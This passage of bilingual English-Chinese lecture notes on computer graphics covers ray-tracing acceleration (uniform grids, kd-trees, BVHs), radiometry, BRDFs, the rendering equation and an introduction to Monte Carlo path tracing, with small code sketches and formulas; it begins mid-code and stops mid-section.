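        tExit  = std::min(tExit, t1);          // exit as soon as leaving ANY slab
    }
    return tEnter < tExit && tExit >= 0.0;     // the iff condition above
}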

    Why Axis-Aligned?

    General

    png

    $$t=\frac{(\mathbf{p}^{\prime}-\mathbf{o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}}$$

3 subtractions, 6 multiplies, 1 division

​3 次减法、6 次乘法、1 次除法

    Slabs perpendicular to x-axis

    png

    $$t=\frac{\mathbf{p}^{\prime}_x-\mathbf{o}_x}{\mathbf{d}_x}$$

1 subtraction, 1 division

​只需要 1 次减法、1 次除法

    Lecture 14: Ray Tracing 2 (Acceleration & Radiometry)

    Announcements

    ​公告

    • GTC news: DLSS 2.0

      图形学前沿

    • GTC news: RTXGI

    • Personal feeling

      个人感受

      • Offline rendering techniques will soon become real-time

        离线渲染技术将很快成为实时技术

      • Current real-time rendering techniques will still be useful

        当前的实时渲染技术仍然有用(光栅化还没有那么快被淘汰)

    Using AABBs to accelerate ray tracing

    Uniform Spatial Partitions (Grids)

    ​统一空间分割(网格)

    Preprocess – Build Acceleration Grid

    ​预处理 - 构建加速网格

    png

    1. Find bounding box

      给所有物体打一个包围盒

    png

2. Create grid

      给这个包围盒用网格划分成多个小包围盒

    png

3. Store each object in overlapping cells

      将每个对象存储在重叠的单元格中


    png

    Ray-Scene Intersection

    Step through grid in ray traversal order

    ​按射线遍历顺序逐步穿过网格

    For each grid cell

    ​对于每个网格单元

    ​Test intersection with all objects stored at that cell

    ​测试与存储在该单元格中的所有对象的交集。如果有交集,则检测到物体,再后续计算


    Grid Resolution?

    png

    One cell

    • No speedup

  Choosing the cell size is the issue: with a single cell there is effectively no acceleration at all.

    png

    Too many cells

    • Inefficiency due to extraneous grid traversal

      无关的网格遍历导致效率低下

    png

    Heuristic:

    启发式:

    • #cells = C * #objs
    • C ≈ 27 in 3D

Around 27 cells per object works well in 3D!


    Uniform Grids – When They Work Well

    png

    Grids work well on large collections of objects that are distributed evenly in size and space

    ​网格适用于大小和空间分布均匀的大型对象集合


    Uniform Grids – When They Fail

    ​统一网格–当它们失效时

    png

    “Teapot in a stadium” problem

It fails when object sizes and spatial distribution are uneven: the “teapot in a stadium” problem.

    Spatial Partitions

    Spatial Partitioning Examples

    ​空间划分实例

    png

    Note: you could have these in both 2D and 3D. In lecture we will illustrate principles in 2D.

    ​注意:您可以在二维和三维中使用这些内容。在课程中,我们将说明 2D 的原理。

In computer graphics, spatial partitioning is a common technique for accelerating searches and queries over objects in space: it reduces search complexity by dividing space into smaller regions or cells. Some examples:

1. Grid: divides space into regular cells, each holding one or more objects. Suited to static scenes, where objects can be located quickly through the grid index.
2. Oct-tree: the 3D analogue of a quadtree. Space is recursively split into eight cubes, each of which may be split into eight again, and so on. Octrees are common in 3D rendering and voxelization.
3. kd-tree: recursively splits space into axis-aligned half-spaces according to the distribution of the data along each dimension; often used for nearest-neighbor search. (Compared with an octree, which splits along $x,y,z$ at once, a kd-tree splits along a single axis per level, so the branching factor is independent of dimension.)
4. BSP-tree: like a kd-tree, but the splitting planes may be oblique (non-axis-aligned planes are harder to compute with).

    KD-Tree Pre-Processing

    png

First cut space $A$ vertically, producing two regions (leaf nodes).

    png

Take one region as $B$ and cut it horizontally, producing two new leaf nodes.

    png

And so on, cutting recursively.

    Note: also subdivide nodes 1 and 2, etc.

Note: nodes 1 and 2 could be subdivided as well; the figure simply stops there.


    Data Structure for KD-Trees

    ​KD 树的数据结构

    Internal nodes store

    内部节点存储

    • split axis: x-, y-, or z-axis

      分割轴:X 轴、Y 轴或 Z 轴

    • split position: coordinate of split plane along axis

      分割位置:分割平面沿轴的坐标

    • children: pointers to child nodes

      子节点:指向子节点的指针

    • No objects are stored in internal nodes

      内部节点中不存储任何对象

    Leaf nodes store

    ​叶节点存储

    • list of objects

      对象列表


    Traversing a KD-Tree

    ​遍历 KD 树

    png

When a ray passes through $A$, we only need to test its intersection against the leaf nodes $1,2,3,4,5$.

    png

    Internal node: split

    ​内部节点:分割

    png

Assume it’s a leaf node: intersect all objects

    ​假设它是叶节点:与所有叶节点里的所有对象判断相交

    png

    Internal node: split

    ​内部节点:分割

    png

    Leaf node: intersect all objects

    ​遇到相交的叶节点,与所有叶节点里的所有对象判断相交

    png

    Intersection found

    ​找到相交的对象

In computer graphics, object partitions and bounding volume hierarchies (BVH) are two common techniques for organizing a scene to speed up rendering and collision detection.

1. Object partitions group the scene's objects (by position or other attributes) so that fewer objects must be processed per query. (Strictly, the kd-tree and octree above partition space rather than objects; the BVH below is the canonical object partition.)
2. Bounding volume hierarchy (BVH): every primitive is enclosed in a leaf bounding volume, bounding volumes are wrapped in ever larger bounding volumes, and the recursion ends with a root volume that encloses the entire scene.

kd-trees are rarely used nowadays: good splits are hard to choose, and one object may fall into several leaf nodes, causing redundant computation.

    Object Partitions & Bounding Volume Hierarchy (BVH)

    Bounding Volume Hierarchy (BVH)

    png

The root node's bounding box encloses the whole scene.

    png

Nest bounding boxes inside the root.

png

​And nest again.

png

​And again!

    png


    Summary: Building BVHs

    • Find bounding box

      查找边界框

    • Recursively split set of objects in two subsets

      递归地将对象集合分成两个子集

    • Recompute the bounding box of the subsets

      重新计算子集的边界框

    • Stop when necessary

      必要时停止

    • Store objects in each leaf node

      在每个叶节点中存储对象


    Building BVHs

    How to subdivide a node?

    ​如何细分节点?

    • Choose a dimension to split

      选择要分割的维度

    • Heuristic #1: Always choose the longest axis in node

      启发式 1: 始终选择节点中最长的轴线

    • Heuristic #2: Split node at location of median object

      启发式 2: 在中位对象的位置分割节点

    Termination criteria?

    ​终止标准?

    • Heuristic: stop when node contains few elements (e.g. 5)

      启发式:当节点包含较少元素(如 5 个)时停止
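Putting the split and termination heuristics together, a recursive build might look like the sketch below; BBox, Object, and the unionBounds/longestAxis/centroid helpers are assumed placeholders (declarations only) for your own scene types:

#include <algorithm>
#include <vector>

struct BBox { /* min/max corners, etc. */ };
struct Object { BBox bbox; };
BBox unionBounds(const std::vector<Object*>& objs);   // assumed helper
int  longestAxis(const BBox& b);                      // assumed helper
double centroid(const Object* o, int axis);           // assumed helper

struct BVHNode {
    BBox bbox;
    BVHNode* left = nullptr;
    BVHNode* right = nullptr;
    std::vector<Object*> objects;              // non-empty only at leaves
};

BVHNode* build(std::vector<Object*> objs) {
    BVHNode* node = new BVHNode;
    node->bbox = unionBounds(objs);            // recompute bounds of this subset
    if (objs.size() <= 5) {                    // heuristic: stop at small leaves
        node->objects = objs;
        return node;
    }
    int axis = longestAxis(node->bbox);        // heuristic #1: longest axis
    auto mid = objs.begin() + objs.size() / 2; // heuristic #2: median object
    std::nth_element(objs.begin(), mid, objs.end(),
        [axis](const Object* a, const Object* b) {
            return centroid(a, axis) < centroid(b, axis);
        });
    node->left  = build(std::vector<Object*>(objs.begin(), mid));
    node->right = build(std::vector<Object*>(mid, objs.end()));
    return node;
}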


    Data Structure for BVHs

    Internal nodes store

    ​内部节点存储

    • Bounding box

      边界框

    • Children: pointers to child nodes

      子节点:指向子节点的指针

    Leaf nodes store

    ​叶节点存储

    • Bounding box

      边界框

    • List of objects

      对象列表

    Nodes represent subset of primitives in scene

    ​节点代表场景中基元的子集

    • All objects in subtree

      子树上的所有对象


    BVH Traversal

    png

Intersect(Ray ray, BVH node) {
    if (ray misses node.bbox) return;
    if (node is a leaf node) {
        test intersection with all objs;
        return closest intersection;
    }
    hit1 = Intersect(ray, node.child1);
    hit2 = Intersect(ray, node.child2);
    return the closer of hit1, hit2;
}

    ​递归地检测是否相交。


    Spatial vs Object Partitions

    png

    Spatial partition (e.g.KD-tree)

    ​空间分区(如 KD 树)

    • Partition space into non-overlapping regions

      将空间划分为不重叠的区域

    • An object can be contained in multiple regions

      一个对象可包含在多个区域中

    png

    Object partition (e.g. BVH)

    ​对象分区(如 BVH)

    • Partition set of objects into disjoint subsets

      将对象集合划分为互不相交的子集

    • Bounding boxes for each set may overlap in space

      每个子集的边界框可能在空间上重叠

    Basic radiometry (辐射度量学)

    Advertisement: new topics from now on, scarcely covered in other graphics courses

    ​广告:从现在开始,其他图形课程很少涉及的新主题


    Radiometry — Motivation

    png

    Observation

    • In assignment 3, we implement the Blinn-Phong model

  在作业 3 中,我们实现了 Blinn-Phong 模型

    • Light intensity $I$ is 10, for example

      例如,光强 $I$ 为 10

    • But 10 what?

      但 10 是什么?连单位都没有

    Do you think Whitted style ray tracing gives you CORRECT results?

    ​你认为怀特风格的光线追踪能得出正确的结果吗?

    All the answers can be found in radiometry

    ​所有答案都可以在辐射测量中找到

    • Also the basics of “Path Tracing”

      还有”路径跟踪“的基础知识


    Radiometry

    ​辐射测量

    Measurement system and units for illumination

    ​照明测量系统和单位

    Accurately measure the spatial properties of light

    ​精确测量光的空间特性

    • New terms: Radiant flux, intensity, irradiance, radiance

      新术语:辐射通量、强度、辐照度、辐射度

    Perform lighting calculations in a physically correct manner

    ​以物理上正确的方式进行照明计算


    My personal way of learning things:

    ​我个人的学习方法:

    • WHY, WHAT, then HOW

      为什么、是什么,然后是怎么做

    Radiant Energy and Flux (Power)

    ​辐射能量和通量(功率)

    Definition: Radiant energy is the energy of electromagnetic radiation. It is measured in units of joules, and denoted by the symbol:

    ​定义:辐射能是电磁辐射的能量。它以焦耳为单位,用符号表示:

    $$Q\mathrm{[J=Joule]}$$

    Definition: Radiant flux (power) is the energy emitted, reflected, transmitted or received, per unit time

    ​定义:辐射通量(功率)是单位时间内发射、反射、传输或接收的能量

    $$\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}\text{ [W = Watt] [lm = lumen]}^\star $$


    Flux – #photons flowing through a sensor in unit time

    ​光通量–单位时间内流经传感器的光子数量

    png


    Important Light Measurements of Interest

    ​重要的相关光测量值

    png

    Light Emitted From A Source
    光源发出的光
    “Radiant Intensity”
    辐射强度

    png

    Light Falling On A Surface
    光落在物体表面
    “Irradiance”
    "辐照度"

    png

    Light Traveling Along A Ray
    光沿着光线行进
    "Radiance"
“辐射度”

    Radiant Intensity

    ​辐射强度

    Definition: The radiant (luminous) intensity is the power per unit solid angle (?) emitted by a point light source.

定义:辐射(发光)强度是点光源在每单位立体角内发出的功率。(立体角?马上解释这是个什么玩意。)

    png

    $I(\omega)\equiv\frac{\mathrm{d}\Phi}{\mathrm{d}\omega}$

    $\left[\frac{\mathrm{W}}{\mathrm{sr}}\right]\left[\frac{\mathrm{lm}}{\mathrm{sr}}=\mathrm{cd}=\mathrm{candela}\right]$

    The candela is one of the seven SI base units.

    ​坎德拉是国际单位制七个基本单位之一。


    Angles and Solid Angles

    png

    Angle: ratio of subtended arc length on circle to radius

平面角:圆上所对弧长与半径之比

    • $\theta=\frac{l}{r}$

    • Circle has $2\pi$ radians

      圆的弧度为 $2\pi$

    png

    Solid angle: ratio of subtended area on sphere to radius squared

立体角:球面上所对面积与半径平方之比

    • $\Omega=\frac{A}{r^2}$

    • Sphere has $4\pi$ steradians


    Differential Solid Angles

    png

Deriving the differential solid angle:

$$\mathrm{d}A=(r\,\mathrm{d}\theta)(r\sin\theta\,\mathrm{d}\phi)=r^2\sin\theta\,\mathrm{d}\theta\,\mathrm{d}\phi$$

    $$\mathrm{d}\omega=\frac{\mathrm{d}A}{r^2}=\sin\theta\mathrm{d}\theta\mathrm{d}\phi $$

**Sphere:** $S^2$

$$\Omega=\int_{S^2}\mathrm{d}\omega=\int_0^{2\pi}\int_0^\pi\sin\theta\,\mathrm{d}\theta\,\mathrm{d}\phi=4\pi$$


    $\omega$ as a direction vector

    ​将 $\omega$ 作为方向向量

    png

    Will use $\omega$ to denote a direction vector (unit length)

    ​用 $\omega$ 表示方向向量(单位长度)


    Isotropic Point Source

    ​各向同性点源

    png

$$\Phi=\int_{S^2}I\,\mathrm{d}\omega=4\pi I$$

    $$I=\frac\Phi{4\pi}$$


    Modern LED Light

    png

    Output: 815 lumens

    ​输出:815 流明

    (11W LED replacement for 60W incandescent)

    ​(11 瓦 LED 可替代 60 瓦白炽灯)

    Radiant intensity?

    ​辐射强度?

    Assume isotropic:

​Intensity = 815 lumens / (4π sr) ≈ 65 candelas

Lecture 15: Ray Tracing 3 (Light Transport & Global Illumination)

    Reviewing Concepts

    png

| 名称 | 公式 | 解释 |
| --- | --- | --- |
| Radiant energy 辐射能(在 CG 中很少使用) | $Q\,[\mathrm{J}=\text{Joule}]$ | the energy of electromagnetic radiation 电磁辐射的能量 |
| Radiant flux (power) 辐射通量(功率) | $\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}\,[\mathrm{W}=\text{Watt}]\,[\mathrm{lm}=\text{lumen}]$ | energy per unit time 单位时间能量 |
| Radiant intensity 辐射强度 | $I(\omega)\equiv\frac{\mathrm{d}\Phi}{\mathrm{d}\omega}$ | power per unit solid angle 单位立体角功率 |
| Solid angle 立体角 | $\Omega=\frac{A}{r^2}$ | ratio of subtended area on sphere to radius squared 球面所对面积与半径平方之比 |

    Irradiance

    辐照度

    Definition: The irradiance is the power per unit area incident on a surface point.

    ​定义:辐照度是照射在表面某一点的每单位面积的功率。

    png

    $$E(\mathrm x)\equiv\frac{\text d\Phi(\mathrm x)}{\mathrm d A}$$

$$\left[\frac{\mathrm{W}}{\mathrm{m}^2}\right]\left[\frac{\text{lm}}{\mathrm{m}^2}=\text{lux}\right]$$


Lambert’s Cosine Law

    ​兰伯特余弦定理

    Irradiance at surface is proportional to cosine of angle between light direction and surface normal.

    ​表面辐照度与光线方向和表面法线之间的角度的余弦成正比。

    (Note: always use a unit area, the cosine applies on $\Phi$)

    ​(注意:始终使用单位面积,余弦适用于 $\Phi$)

    png

    Top face of cube receives a certain amount of power
    立方体顶面接收一定量的能量
    $E=\frac{\Phi}{A}$

    png

    Top face of 60º rotated cube receives half power
    60º 旋转立方体的顶面接收一半功率
    $E=\frac{1}{2}\frac{\Phi}{A}$

    png

    In general, power per unit area is proportional to $\cos\theta=l\cdot n$
一般而言,单位面积接收的功率与 $\cos\theta=l\cdot n$ 成正比
    $E=\frac{\Phi}{A}\cos\theta$

    Why Do We Have Seasons?

    png

    ​为什么我们会有季节?因为太阳光到地球各个地方的夹角不同。

Earth’s axis of rotation: ~23.5° off axis


    Correction: Irradiance Falloff

    ​校正:辐照度衰减

    png

    Assume light is emitting power in a uniform angular distribution

    ​假设光以均匀的角度分布发射功率

Compare irradiance at the surface of two spheres: at the unit sphere $E=\frac{\Phi}{4\pi}$, and at radius $r$, $E'=\frac{\Phi}{4\pi r^2}=E/r^2$.

​比较两个球面上的辐照度:单位球面处 $E=\Phi/4\pi$,半径 $r$ 处 $E'=\Phi/(4\pi r^2)=E/r^2$,随距离的平方衰减。

    Radiance

​辐射度

    png

    Radiance is the fundamental field quantity that describes the distribution of light in an environment

    ​辐射度是描述环境中光分布的基本场量

    • Radiance is the quantity associated with a ray

      辐射度是与射线相关的量

    • Rendering is all about computing radiance

      渲染就是计算辐射度

    Definition: The radiance (luminance) is the power emitted, reflected, transmitted or received by a surface, per unit solid angle, per projected unit area.

    ​定义:辐射度(亮度)是表面在单位立体角单位投影面积上发射、反射、透射或接收的功率。

    png

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    $\cos\theta$ accounts for projected surface area

    ​$\cos\theta$ 表示投影表面积

$$\left[\frac{\mathrm{W}}{\mathrm{sr}\,\mathrm{m}^{2}}\right]\left[\frac{\mathrm{cd}}{\mathrm{m}^{2}}=\frac{\mathrm{lm}}{\mathrm{sr}\,\mathrm{m}^{2}}=\mathrm{nit}\right]$$

    Definition: power per unit solid angle per projected unit area.

    ​定义:单位投影面积单位立体角的功率。

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    Recall

    • Irradiance: power per projected unit area

      辐照度:单位投影面积的功率

    • Intensity: power per solid angle

      强度:单位立体角的功率

    So

    • Radiance: Irradiance per solid angle

      辐射度:单位立体角的辐照度

    • Radiance: Intensity per projected unit area

      辐射度:单位投影面积的强度


    Incident Radiance

    ​入射辐射

    Incident radiance is the irradiance per unit solid angle arriving at the surface.

    ​入射辐射度是到达表面的每单位立体角的辐射度。

    png

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}E(\mathrm{p})}{\mathrm{d}\omega\cos\theta}$$

    i.e. it is the light arriving at the surface along a given ray (point on surface and incident direction).

    ​即,它是沿给定射线(表面上的点和入射方向)到达表面的光。


    Exiting Radiance

    png

    Exiting surface radiance is the intensity per unit projected
    area leaving the surface.

    ​出射表面辐射度是离开表面的每单位投影面积的强度。

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}I(\mathrm{p},\omega)}{\mathrm{d}A\cos\theta}$$

    e.g. for an area light it is the light emitted along a given ray
    (point on surface and exit direction).

    ​例如,对于区域光来说,它是沿给定射线(表面上的点和出射方向)发射的光。


    Irradiance vs. Radiance

    ​辐照度与辐射度

    Irradiance: total power received by area $\text dA$

    ​辐照度:区域 $\text dA$ 接收的总功率

    Radiance: power received by area $\text dA$ from “direction” $\text d\omega$

    ​辐射度:区域 $\text dA$ 从“方向” $\text d\omega$ 接收的功率

$$\begin{aligned}\mathrm{d}E(\mathrm{p},\omega)&=L_i(\mathrm{p},\omega)\cos\theta\,\mathrm{d}\omega\\E(\mathrm{p})&=\int_{H^2}L_i(\mathrm{p},\omega)\cos\theta\,\mathrm{d}\omega\end{aligned}$$

    png

    Unit Hemisphere 单位半球: $H^2$

    Bidirectional Reflectance Distribution Function (BRDF)

    ​双向反射分布函数 (BRDF)


    Reflection at a Point

    ​点的反射

    Radiance from direction $\omega_i$ turns into the power $E$ that $\text dA$ receives
    Then power $E$ will become the radiance to any other direction $\omega_o$

来自方向 $\omega_i$ 的辐射度变为 $\mathrm dA$ 接收的功率 $E$;随后功率 $E$ 又成为射向任意其他方向 $\omega_o$ 的辐射度。

    png

Differential irradiance incoming 入射的微分辐照度: $\mathrm{d}E(\omega_i)=L(\omega_i)\cos\theta_i\,\mathrm{d}\omega_i$

Differential radiance exiting (due to $\mathrm{d}E(\omega_i)$) 出射的微分辐射度(由 $\mathrm{d}E(\omega_i)$ 引起): $\mathrm{d}L_r(\omega_r)$


    BRDF

    The Bidirectional Reflectance Distribution Function (BRDF) represents how much light is reflected into each outgoing direction $\omega_r$ from each incoming direction

    ​双向反射分布函数 (BRDF) 表示从每个入射方向反射到每个出射方向 $\omega_r$ 的光量

    png

    $$f_r(\omega_i\to\omega_r)=\frac{\mathrm{d}L_r(\omega_r)}{\mathrm{d}E_i(\omega_i)}=\frac{\mathrm{d}L_r(\omega_r)}{L_i(\omega_i)\cos\theta_i\mathrm{d}\omega_i}\left[\frac{1}{\mathrm{sr}}\right]$$


    The Reflection Equation

    ​反射方程

    png

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$


    Challenge: Recursive Equation

    ​挑战:递归方程

    Reflected radiance depends on incoming radiance

    ​反射辐射取决于入射辐射

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    • $L_r(\mathrm{p},\omega_r)$ reflected radiance 反射辐射
    • $L_{i}(\mathrm{p},\omega_{i})$ incoming radiance 入射辐射

    But incoming radiance depends on reflected radiance (at
    another point in the scene)

    ​但入射辐射取决于反射辐射(在场景中的另一点)


    The Rendering Equation

    ​渲染方程

    Re-write the reflection equation 重写反射方程:

    $$\begin{aligned}L_r(\text{p},\omega_r)=\int_{H^2}f_r(\text{p},\omega_i\to\omega_r)L_i(\text{p},\omega_i)\cos\theta_i\text{d}\omega_i\end{aligned}$$

    by adding an Emission term to make it general!

    ​通过添加发射项使其变得通用!

    The Rendering Equation

    $$\begin{aligned}L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i\end{aligned}$$

    How to solve? Next lecture!

    Note: now, we assume that all directions are pointing outwards!

    注意:现在,我们假设所有方向都指向外面($\Omega^+$)!

    Understanding the rendering equation

    ​理解渲染方程

    png

    ​对于单个点光源:

    $L_r(x,\omega_r)=L_e(x,\omega_r)+L_i(x,\omega_i)f(x,\omega_i,\omega_r)(\omega_i,n)$

    • $L_r(x,\omega_r)$

      Reflected Light (Output Image) 反射光(输出图像)

    • $L_e(x,\omega_r)$

      Emission

      自发光

    • $L_i(x,\omega_i)$

      Incident Light (from light source)

      入射光(来自光源)

    • $f(x,\omega_i,\omega_r)$

      BRDF

    • $(\omega_i,n)$

      Cosine of Incident angle

      入射角余弦

    png

    ​多个点光源,求和。Sum over all light sources.

$$L_r(x,\omega_r)=L_e(x,\omega_r)+\sum L_i(x,\omega_i)f(x,\omega_i,\omega_r)(\omega_i,n)$$

    png

    ​平面光源,使用积分。Replace sum with integral.

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_i(x,\omega_i)f(x,\omega_i,\omega_r)\cos\theta_i\mathrm{d}\omega_i$$

    png

    Surfaces (interreflection)

    ​表面(相互反射)

    png

    png

This is the result rendered in the original paper back then.


    Rendering Equation as Integral Equation

​将渲染方程视为积分方程

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_r(x^{\prime},-\omega_i)f(x,\omega_i,\omega_r)\cos\theta_id\omega_i$$

To see an object, either it must emit light itself or it must reflect light coming from other sources.

    Is a Fredholm Integral Equation of second kind [extensively studied numerically] with canonical form

    ​是具有规范形式的第二类 Fredholm 积分方程 [经过广泛的数值研究]

    $$l(u)=e(u)+\int l(v)K(u,v)dv$$

$K(u,v)\,\mathrm dv$ is the kernel of the equation, the light transport operator.

    $$L=E+KL$$

    Can be discretized to a simple matrix equation [or system of simultaneous linear equations] ($L$, $E$ are vectors, $K$ is the light transport matrix)

    ​可以离散化为一个简单的矩阵方程[或联立线性方程组]($L$、$E$为向量,$K$为光传输矩阵)


    Ray Tracing and extensions

    ​光线追踪和扩展

    • General class numerical Monte Carlo methods

      通用类数值蒙特卡罗方法

    • Approximate set of all paths of light in scene

      场景中所有光路的近似集

$$\begin{aligned}L&=E+KL\\L-KL&=E\\(I-K)L&=E\\L&=(I-K)^{-1}E\end{aligned}$$

In matrix algebra, $(I-K)^{-1}$ can be expanded as a series, much like a Taylor expansion (the slide calls it the binomial theorem):

$$\begin{aligned}L&=(I+K+K^2+K^3+\cdots)E\\&=E+KE+K^2E+K^3E+\cdots\end{aligned}$$

    • $E$

      Emission directly From light sources

      直接从光源发射

    • $KE$

      Direct Illumination on surfaces

      表面直接照明

    • $K^2E$

      Indirect Illumination (One bounce indirect) [Mirrors, Refraction]

      间接照明(一次间接反射)[镜子、折射]

    • $K^3E$

      (Two bounce indirect illum.)

      (两次反射间接照明。)

If we keep only $L=E+KE$, the result corresponds to shading in rasterization 光栅化中的着色 (direct illumination only).

    png

With direct illumination only, no bounced light is computed, so surfaces facing away from the light are pitch black.

​The more bounces we compute, the more realistic and the brighter the image, but the brightness converges rather than growing without bound.


    Probability Review

    Random Variables

    ​随机变量

    $X$ random variable. Represents a distribution of potential values

    ​随机变量。表示潜在值的分布

    $X\sim p(x)$ probability density function (PDF). Describes relative probability of a random process choosing value

    ​概率密度函数(PDF)。描述随机过程选择值的相对概率

    Example: uniform PDF: all values over a domain are equally likely

    ​示例:均匀密度函数:域内的所有值都具有相同的可能性

    png

    ​示例:扔骰子

    $X$ takes on values $1, 2, 3, 4, 5, 6$

    $p(1)=p(2)=p(3)=p(4)=p(5)=p(6)$


    Probabilities

    ​概率

    png

    $n$ discrete values $x_i$ with probability $p_i$

    ​$n$ 个离散值 $x_i$ 具有概率 $p_i$

    Requirements of a probability distribution:

    ​概率分布的要求:

    $p_i\ge 0$

    $\sum^n_{i=1}p_i=1$

    Six-sided die example 六面骰子示例:$p_i=\frac{1}{6}$


    Expected Value of a Random Variable

    ​随机变量的期望值

    The average value that one obtains if repeatedly drawing samples from the random distribution.

    ​从随机分布中反复抽取样本所获得的平均值。

    Expected value of $X$:$E[X]=\sum_{i=1}^{n}x_{i}p_{i}$

Die example: $E[X]=\sum_{i=1}^{6} i\cdot\frac{1}{6}=(1+2+3+4+5+6)/6=3.5$


    Continuous Case: Probability Distribution Function (PDF)

    ​连续情况:概率分布函数 (PDF)

    png

    $$X\sim p(x)$$

    A random variable $X$ that can take any of a continuous set of values, where the relative probability of a particular value is given by a continuous probability density function $p(x)$.

    ​随机变量 $X$ 可以取一组连续的值中的任意一个,其中特定值的相对概率由连续概率密度函数 $p(x)$ 给出。

Conditions on $p(x)$: $p(x)\geq0$ and $\int p(x)\,\mathrm{d}x=1$

    Expected value of $X$: $E[X]=\int xp(x)dx$

Lecture 16: Ray Tracing 4 (Monte Carlo Path Tracing)

    Monte Carlo Integration

    Why: we want to solve an integral, but it can be too difficult to solve analytically.

    ​原因:我们想解一个积分,但用分析方法(牛顿莱布尼茨公式)解太难了。

What & How: estimate the integral of a function by averaging random samples of the function’s value.

    ​内容和方法:通过对函数值的随机样本求平均值来估计函数的积分。

    png

    Let us define the Monte Carlo estimator for the definite integral of given function $f(x)$

    ​让我们为给定函数 $f(x)$ 的定积分定义蒙特卡洛估计量

    Definite integral 定积分:$\int_a^bf(x)dx$

    Random variable 随机变量:$X_i\sim p(x)$

    Monte Carlo estimator 蒙特卡洛估计量:$F_N=\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}$


    Example: Uniform Monte Carlo Estimator

    ​示例:统一蒙特卡罗估计量

    Uniform random variable 对于均匀随机变量:

    png

    png

$$X_i\sim p(x)=C,\qquad\int_a^b p(x)\,\mathrm{d}x=1\;\Rightarrow\;\int_a^b C\,\mathrm{d}x=1\;\Rightarrow\;C=\frac{1}{b-a}$$

    Uniform random variable 均匀随机变量:$X_i\sim p(x)=\frac1{b-a}$

    Basic Monte Carlo estimator 基本蒙特卡罗估计量:$F_N=\frac{b-a}N\sum_{i=1}^Nf(X_i)$
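For instance, estimating $\int_0^\pi\sin x\,\mathrm dx=2$ with the uniform estimator; a standalone C++ sketch:

#include <cmath>
#include <cstdio>
#include <random>

int main() {
    const double a = 0.0, b = 3.14159265358979323846;
    const int N = 100000;
    std::mt19937 rng(42);
    std::uniform_real_distribution<double> u(a, b);   // X_i ~ p(x) = 1 / (b - a)
    double sum = 0.0;
    for (int i = 0; i < N; ++i)
        sum += std::sin(u(rng));                      // accumulate f(X_i)
    // F_N = (b - a) / N * Σ f(X_i); prints a value close to the exact answer 2.
    std::printf("estimate = %f (exact 2)\n", (b - a) / N * sum);
}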


    Monte Carlo Integration

    ​蒙特卡罗积分

$$\int f(x)\,\mathrm{d}x\approx\frac{1}{N}\sum_{i=1}^N\frac{f(X_i)}{p(X_i)}\qquad X_i\sim p(x)$$

    Some notes:

    一些注意事项:

    • The more samples, the less variance.

      样本越多,方差越小。

    • Sample on $x$, integrate on $x$.

      在 $x$ 上采样,在 $x$ 上积分。

    Path Tracing

    ​路径追踪

    Motivation: Whitted-Style Ray Tracing

    ​动机:Whitted 式光线追踪

    Whitted-style ray tracing:

    ​Whitted 式光线追踪:

    • Always perform specular reflections / refractions

      始终执行镜面反射/折射

    • Stop bouncing at diffuse surfaces

      停止在漫反射表面反弹

    Are these simplifications reasonable?

    ​这些简化合理吗?

High level: let’s progressively improve upon Whitted-style ray tracing and arrive at our path tracing algorithm!

    ​高层次:让我们逐步改进 Whitted 风格的光线追踪并引出我们的路径追踪算法!


    Whitted-Style Ray Tracing: Problem 1

    ​Whitted 式光线追踪:问题 1

    Where should the ray be reflected for glossy materials?

    ​对于光泽材质来说,射线应该在哪里反射?

    png

It should be glossy reflection: the object receives both direct light and light reflected from other objects.


    No reflections between diffuse materials?

    ​漫反射材质之间没有反射吗?

    png

The right image is correct: objects (e.g. the box) receive both direct light and light reflected from other objects (e.g. the red wall).


    Whitted-Style Ray Tracing is Wrong

    ​Whitted 式光线追踪是错误的

    But the rendering equation is correct

    ​但渲染方程是正确的

    $$L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    But it involves

    ​但它涉及

    • Solving an integral over the hemisphere, and

      求解半球上的积分,以及

    • Recursive execution

      递归执行

    How do you solve an integral numerically?

    ​如何用数值方法求解积分?


    A Simple Monte Carlo Solution

    ​简单的蒙特卡罗解决方案

    Suppose we want to render one pixel (point) in the following scene for direct illumination only

    ​假设我们想在以下场景中渲染一个像素(点),仅用于直接照明

    Note: this is an area light

    png

    Abuse the concept of Reflection Equation a little bit

    ​稍微滥用一下反射方程的概念

    $$L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i$$

    (again, we assume all directions are pointing outwards)

    ​(再次假设所有方向都指向外面)

Fancy as it is, it’s still just an integration over directions

​尽管很花哨,但它仍然只是对方向的积分

    png

    So, of course we can solve it using Monte Carlo integration!

    ​因此,我们当然可以使用蒙特卡洛积分来解决这个问题!

    We want to compute the radiance at $p$ towards the camera

    ​我们想要计算 $p$ 处朝向相机的辐射度

    $$\begin{aligned}L_o(p,\omega_o)=\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm d\omega_i\end{aligned}$$

    Monte Carlo integration:

    ​蒙特卡洛积分:

